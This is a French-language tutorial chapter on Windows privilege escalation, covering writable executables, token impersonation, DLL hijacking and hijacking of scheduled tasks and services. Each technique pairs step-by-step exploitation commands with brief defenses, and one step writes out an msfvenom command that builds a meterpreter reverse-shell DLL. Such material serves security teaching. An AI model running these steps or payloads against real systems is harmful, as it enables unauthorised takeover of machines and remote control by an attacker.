L’élévation de privilèges est l’étape clé qui transforme un accès basique en contrôle total. Elle permet aux attaquants de passer d’un simple compte utilisateur à des droits d’administrateur ou SYSTEM. Voyons comment ce tour de magie opère… et surtout, comment l’arrêter. Les 2 types d'escalade de privilèges • Escalade verticale : de User à Admin/SYSTEM • Escalade horizontale : voler l’accès d’un autre utilisateur (même niveau) Dans les deux cas, les hackers cherchent à étendre leur pouvoir sur le système ou le réseau. Techniques classiques d'escalade de privilèges Windows 1. Permissions mal configurées • Fichiers ou dossiers accessibles en écriture à tous • Possibilité de remplacer un EXE par un malware Exploitation : 1. Scanner les permissions :Code:icacls C:\Chemin\Vers\Fichier2. Rechercher les droits Everyone:F 3. Remplacer l'exécutable 4. Attendre son exécution Défenses : • Auditer régulièrement les permissions • Restreindre l’accès aux fichiers sensibles 2. Usurpation de jeton (Token Impersonation) • Windows utilise des jetons d'accès pour représenter les identifiants • Un jeton Admin mal protégé = accès root Exploitation : 1. Enumérer les jetons :Code:Invoke-TokenManipulation -Enumerate2. Usurper un jeton :Code:runas /user:Administrateur “cmd.exe”Défenses : • Désactiver la délégation inutile • Utiliser Credential Guard 3. DLL Hijacking • Les applis chargent parfois des DLL depuis des emplacements non sécurisés • Un hacker peut injecter un fichier piégé Exploitation : 1. Identifier une appli vulnérable 2. Créer une DLL piégée :Code:msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > malicieux.dll3. Remplacer la DLL 4. Lancer l’appli Défenses : • Vérifier la signature des DLL • Éviter les applis chargées depuis des répertoires douteux Astuce 11 : détourner une tâche planifiée Certaines tâches planifiées tournent avec des droits élevés. Mal configurées, elles deviennent des portes d’entrée en or. Exploitation : 1. Lister les tâches :Code:schtasks /query /fo LIST /v2. Vérifier les droits via AccessChk 3. Modifier l'exécutable associé 4. Lancer la tâche :Code:schtasks /run /tn “NomDeLaTâche”Défenses : • Interdire l’écriture sur les tâches critiques • Auditer les tâches régulièrement Astuce 12 : exploiter un service mal sécurisé Un service Windows mal configuré peut devenir une backdoor royale pour l’élévation de privilèges. Exploitation : 1. Lister les services :Code:sc qc “NomDuService”2. Chercher les binaires modifiables 3. Remplacer l’exécutable 4. Redémarrer le service :Code:sc start “NomDuService”Défenses : • Contrôle strict des accès aux services • Revue régulière des configurations Outils avancés pour l'escalade de privilèges PowerUp • Script PowerShell pour détecter failles et mauvaises configs • Usage :Code:Import-Module .\PowerUp.ps1 Invoke-AllChecksWindows Exploit Suggester • Repère les vulnérabilités exploitables à partir des patchs manquants • Usage :Code:windows-exploit-suggester.py –update windows-exploit-suggester.py -d database -i systeminfo.txt Conclusion du chapitre Tu sais maintenant : • Identifier et exploiter les erreurs de configuration • Utiliser les tâches, services, DLL et jetons à ton avantage • Défendre un système contre ces attaques critiques Dans le chapitre suivant, cap sur la gestion des comptes utilisateurs Windows : récupération, réinitialisation, et accès furtif garantis.